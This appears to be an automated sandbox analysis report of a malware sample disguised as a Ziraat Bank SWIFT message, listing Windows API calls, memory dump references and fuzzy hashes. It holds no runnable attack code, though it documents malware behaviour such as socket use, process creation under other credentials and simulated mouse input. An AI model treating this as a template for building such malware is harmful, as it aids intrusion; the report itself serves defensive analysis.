                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3311875123-0
                                                                                                                                                        • Opcode ID: d15f7bc1fbd69233c0e7f76f0cbc94a6b286facbdf6b5fc6aa9d8f6b8448f0df
                                                                                                                                                        • Instruction ID: 428f1835f885e1df167138f627f6534e1a8b1984fb5fe714c4e1834f26a3924c
                                                                                                                                                        • Opcode Fuzzy Hash: d15f7bc1fbd69233c0e7f76f0cbc94a6b286facbdf6b5fc6aa9d8f6b8448f0df
                                                                                                                                                        • Instruction Fuzzy Hash: 3851AC70601209EBDF60CFA8D898FEDBBF4BF45318F14815DE8559A2A1D3B1AD44CB51
                                                                                                                                                        APIs
                                                                                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 000D8E7C
                                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 000D8E89
                                                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 000D8EAD
                                                                                                                                                        • #16.WSOCK32(?,?,00000000,00000000), ref: 000D8EC5
                                                                                                                                                        • _strlen.LIBCMT ref: 000D8EF7
                                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 000D8F6A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$_strlenselect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2217125717-0
                                                                                                                                                        • Opcode ID: 747e942f3e0e5c408589a9e856dcc77264dbd1f0c0bd91c50921e4cbb93c3817
                                                                                                                                                        • Instruction ID: 0d92d266e08d874aa14cbf82e43709b342a9b7604ca40a9bb242f53a009da78a
                                                                                                                                                        • Opcode Fuzzy Hash: 747e942f3e0e5c408589a9e856dcc77264dbd1f0c0bd91c50921e4cbb93c3817
                                                                                                                                                        • Instruction Fuzzy Hash: 8441D271500204AFCB14EBA4DD95EEEB7B9EF18314F10866AF15A972D2DF30AE40CB60
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F
                                                                                                                                                        • BeginPaint.USER32(?,?,?), ref: 0009AC2A
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0009AC8E
                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 0009ACAB
                                                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0009ACBC
                                                                                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 0009AD06
                                                                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 000FE673
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2592858361-0
                                                                                                                                                        • Opcode ID: 77d9f5c352fc6f44f94042a846babe0279e10be1ec9a740e62712f3cf5e36244
                                                                                                                                                        • Instruction ID: 13f48d54192c0f97402cdda3071878b23b51213256882080154b271ae1fd0df2
                                                                                                                                                        • Opcode Fuzzy Hash: 77d9f5c352fc6f44f94042a846babe0279e10be1ec9a740e62712f3cf5e36244
                                                                                                                                                        • Instruction Fuzzy Hash: 2741D770204304AFCB10DF64DC84FBA7BE8EB56370F140669F9A5876B1C7719885EBA2
                                                                                                                                                        APIs
                                                                                                                                                        • ShowWindow.USER32(00141628,00000000,00141628,00000000,00000000,00141628,?,000FDC5D,00000000,?,00000000,00000000,00000000,?,000FDAD1,00000004), ref: 000EE40B
                                                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 000EE42F
                                                                                                                                                        • ShowWindow.USER32(00141628,00000000), ref: 000EE48F
                                                                                                                                                        • ShowWindow.USER32(00000000,00000004), ref: 000EE4A1
                                                                                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 000EE4C5
                                                                                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 000EE4E8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 642888154-0
                                                                                                                                                        • Opcode ID: ca54dcb0e0726407b854b2b1019d439f84286f1c254f3f013483880188e4aea9
                                                                                                                                                        • Instruction ID: 2c45af9e684d57d090c08e50a45a1a1b73ff29a485f44f1e5a9cb865f410c97c
                                                                                                                                                        • Opcode Fuzzy Hash: ca54dcb0e0726407b854b2b1019d439f84286f1c254f3f013483880188e4aea9
                                                                                                                                                        • Instruction Fuzzy Hash: 8B4180746015C8EFDB62CF25C499B947BE1BF09304F2881A9FA58AF2E2C771E841CB51
                                                                                                                                                        APIs
                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 000C98D1
                                                                                                                                                          • Part of subcall function 0009F4EA: std::exception::exception.LIBCMT ref: 0009F51E
                                                                                                                                                          • Part of subcall function 0009F4EA: __CxxThrowException@8.LIBCMT ref: 0009F533
                                                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 000C9908
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 000C9924
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 000C999E
                                                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 000C99B3
                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 000C99D2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2537439066-0
                                                                                                                                                        • Opcode ID: 96527611bb51146e02d888d17d6533dc8f21e6783fe77f801659f7b8bfb00acb
                                                                                                                                                        • Instruction ID: 410d9dc983c158b8251cc8f869b0455e727503d7a2fe6f904db7f3f91d3c4ac1
                                                                                                                                                        • Opcode Fuzzy Hash: 96527611bb51146e02d888d17d6533dc8f21e6783fe77f801659f7b8bfb00acb
                                                                                                                                                        • Instruction Fuzzy Hash: 85313031900105EBDF109F95DC85EAE77B8FF45710B148069F905AB246D770DE54DBA0
                                                                                                                                                        APIs
                                                                                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,000D77F4,?,?,00000000,00000001), ref: 000D9B53
                                                                                                                                                          • Part of subcall function 000D6544: GetWindowRect.USER32(?,?), ref: 000D6557
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 000D9B7D
                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 000D9B84
                                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 000D9BB6
                                                                                                                                                          • Part of subcall function 000C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C7AD0
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 000D9BE2
                                                                                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 000D9C44
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4137160315-0
                                                                                                                                                        • Opcode ID: 8e6277627409411394104c276f0b096743ca2ebe3a46875e5246b83c654432ca
                                                                                                                                                        • Instruction ID: 213918cf9d22512e443be4fbec4f3e0d521bf084b363c8f0e7fa827c9ab12e25
                                                                                                                                                        • Opcode Fuzzy Hash: 8e6277627409411394104c276f0b096743ca2ebe3a46875e5246b83c654432ca
                                                                                                                                                        • Instruction Fuzzy Hash: DB31C172104305ABC710DF68DC49F9AB7E9FF88314F00091AF589E7282DB71E948CBA2
                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000BAFAE
                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 000BAFB5
                                                                                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 000BAFC4
                                                                                                                                                        • CloseHandle.KERNEL32(00000004), ref: 000BAFCF
                                                                                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000BAFFE
                                                                                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 000BB012
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1413079979-0
                                                                                                                                                        • Opcode ID: 821859f487ffbbc093ec610e9e101a25320a1de214d6e436bb3567c8f4bf2000
                                                                                                                                                        • Instruction ID: de1d86a58724d539577a5738bd5e6463b5954b9f6498a9470c748088cd48ad16
                                                                                                                                                        • Opcode Fuzzy Hash: 821859f487ffbbc093ec610e9e101a25320a1de214d6e436bb3567c8f4bf2000
                                                                                                                                                        • Instruction Fuzzy Hash: 4D214CB220420AABDB129FD4ED09BEE7BA9EB45304F044025FA41A6161C7B6DD61EB61
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0009AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0009AFE3
                                                                                                                                                          • Part of subcall function 0009AF83: SelectObject.GDI32(?,00000000), ref: 0009AFF2
                                                                                                                                                          • Part of subcall function 0009AF83: BeginPath.GDI32(?), ref: 0009B009
                                                                                                                                                          • Part of subcall function 0009AF83: SelectObject.GDI32(?,00000000), ref: 0009B033
                                                                                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 000EEC20
                                                                                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 000EEC34
                                                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 000EEC42
                                                                                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 000EEC52
                                                                                                                                                        • EndPath.GDI32(00000000), ref: 000EEC62
                                                                                                                                                        • StrokePath.GDI32(00000000), ref: 000EEC72
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 43455801-0
                                                                                                                                                        • Opcode ID: 60729889175100d630aac8a7f9cf6aa20d598eccbf87b76dd15108cdb797cbf5
                                                                                                                                                        • Instruction ID: e8c117894cba6f467ce334ebbe71b983ba2ec01ab9f12046d1c993773ae0a2de
                                                                                                                                                        • Opcode Fuzzy Hash: 60729889175100d630aac8a7f9cf6aa20d598eccbf87b76dd15108cdb797cbf5
                                                                                                                                                        • Instruction Fuzzy Hash: C7111B7600014DBFEF029F90EC88EEA7F6DEB08360F048122BE4999570D7B19D95DBA0
                                                                                                                                                        APIs
                                                                                                                                                        • GetDC.USER32(00000000), ref: 000BE1C0
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 000BE1D1
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000BE1D8
                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 000BE1E0
                                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 000BE1F7
                                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 000BE209
                                                                                                                                                          • Part of subcall function 000B9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,000B9A05), ref: 000BA53A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 603618608-0
                                                                                                                                                        • Opcode ID: 02e8fc8519152ef92939f51458767a3d7f9c1b89208033c7464dc99a14da6c68
                                                                                                                                                        • Instruction ID: 75a460024443a7bcff82820176b4c8db6e34158d2df35d06368e7864126d69dc
                                                                                                                                                        • Opcode Fuzzy Hash: 02e8fc8519152ef92939f51458767a3d7f9c1b89208033c7464dc99a14da6c68
                                                                                                                                                        • Instruction Fuzzy Hash: F1018FB5A00214BFEB109BE6DC45B9EBFB8EB48351F004066FA08A7290DA719C00CBA0
                                                                                                                                                        APIs
                                                                                                                                                        • __init_pointers.LIBCMT ref: 000A7B47
                                                                                                                                                          • Part of subcall function 000A123A: __initp_misc_winsig.LIBCMT ref: 000A125E
                                                                                                                                                          • Part of subcall function 000A123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000A7F51
                                                                                                                                                          • Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000A7F65
                                                                                                                                                          • Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000A7F78
                                                                                                                                                          • Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000A7F8B
                                                                                                                                                          • Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000A7F9E
                                                                                                                                                          • Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 000A7FB1
                                                                                                                                                          • Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 000A7FC4
                                                                                                                                                          • Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 000A7FD7
                                                                                                                                                          • Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 000A7FEA
                                                                                                                                                          • Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 000A7FFD
                                                                                                                                                          • Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 000A8010
                                                                                                                                                          • Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 000A8023
                                                                                                                                                          • Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 000A8036
                                                                                                                                                          • Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 000A8049
                                                                                                                                                          • Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 000A805C
                                                                                                                                                          • Part of subcall function 000A123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 000A806F
                                                                                                                                                        • __mtinitlocks.LIBCMT ref: 000A7B4C
                                                                                                                                                          • Part of subcall function 000A7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0013AC68,00000FA0,?,?,000A7B51,000A5E77,00136C70,00000014), ref: 000A7E41
                                                                                                                                                        • __mtterm.LIBCMT ref: 000A7B55
                                                                                                                                                          • Part of subcall function 000A7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,000A7B5A,000A5E77,00136C70,00000014), ref: 000A7D3F
                                                                                                                                                          • Part of subcall function 000A7BBD: _free.LIBCMT ref: 000A7D46
                                                                                                                                                          • Part of subcall function 000A7BBD: DeleteCriticalSection.KERNEL32(0013AC68,?,?,000A7B5A,000A5E77,00136C70,00000014), ref: 000A7D68
                                                                                                                                                        • __calloc_crt.LIBCMT ref: 000A7B7A
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 000A7BA3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2942034483-0
                                                                                                                                                        • Opcode ID: ede9ce5c097b7b5fd8e52772519ccf2f0b09fe421b6f62a78b5ccbdd4a446eb5
                                                                                                                                                        • Instruction ID: c50d5c478a7375e7982581d2a898e457a0da413691835fac509de6a826304b90
                                                                                                                                                        • Opcode Fuzzy Hash: ede9ce5c097b7b5fd8e52772519ccf2f0b09fe421b6f62a78b5ccbdd4a446eb5
                                                                                                                                                        • Instruction Fuzzy Hash: F4F0907212D31219EA65B7F47C06BCB26D49F43731F2486A9F8ACC90D3FF25884141B1
                                                                                                                                                        APIs
                                                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0008281D
                                                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00082825
                                                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00082830
                                                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0008283B
                                                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00082843
                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0008284B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4278518827-0
                                                                                                                                                        • Opcode ID: 0165fd5d629550198e0d70710db83f5e55196011f3a39d97e7417999cdca90cc
                                                                                                                                                        • Instruction ID: 4296afb8b2c1afd1adc771da67b1771e721d43cf7ff799a02aff5fb00f648685
                                                                                                                                                        • Opcode Fuzzy Hash: 0165fd5d629550198e0d70710db83f5e55196011f3a39d97e7417999cdca90cc
                                                                                                                                                        • Instruction Fuzzy Hash: 9E0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1423608774-0
                                                                                                                                                        • Opcode ID: f521a3bd97579be5a149aefce4a8d13c0aa4e399f144a435f6628e899f117422
                                                                                                                                                        • Instruction ID: 3c16769e6e3efdc0ab4909cde39d1b27bf0a98f765a4df498d0081b0da2ad228
                                                                                                                                                        • Opcode Fuzzy Hash: f521a3bd97579be5a149aefce4a8d13c0aa4e399f144a435f6628e899f117422
                                                                                                                                                        • Instruction Fuzzy Hash: 63018132102611ABD7151B94FC4CEEF77A9FF88701B44042DF543928A4DBB4A840DB91
                                                                                                                                                        APIs
                                                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 000C7C07
                                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 000C7C1D
                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 000C7C2C
                                                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000C7C3B
                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000C7C45
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000C7C4C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
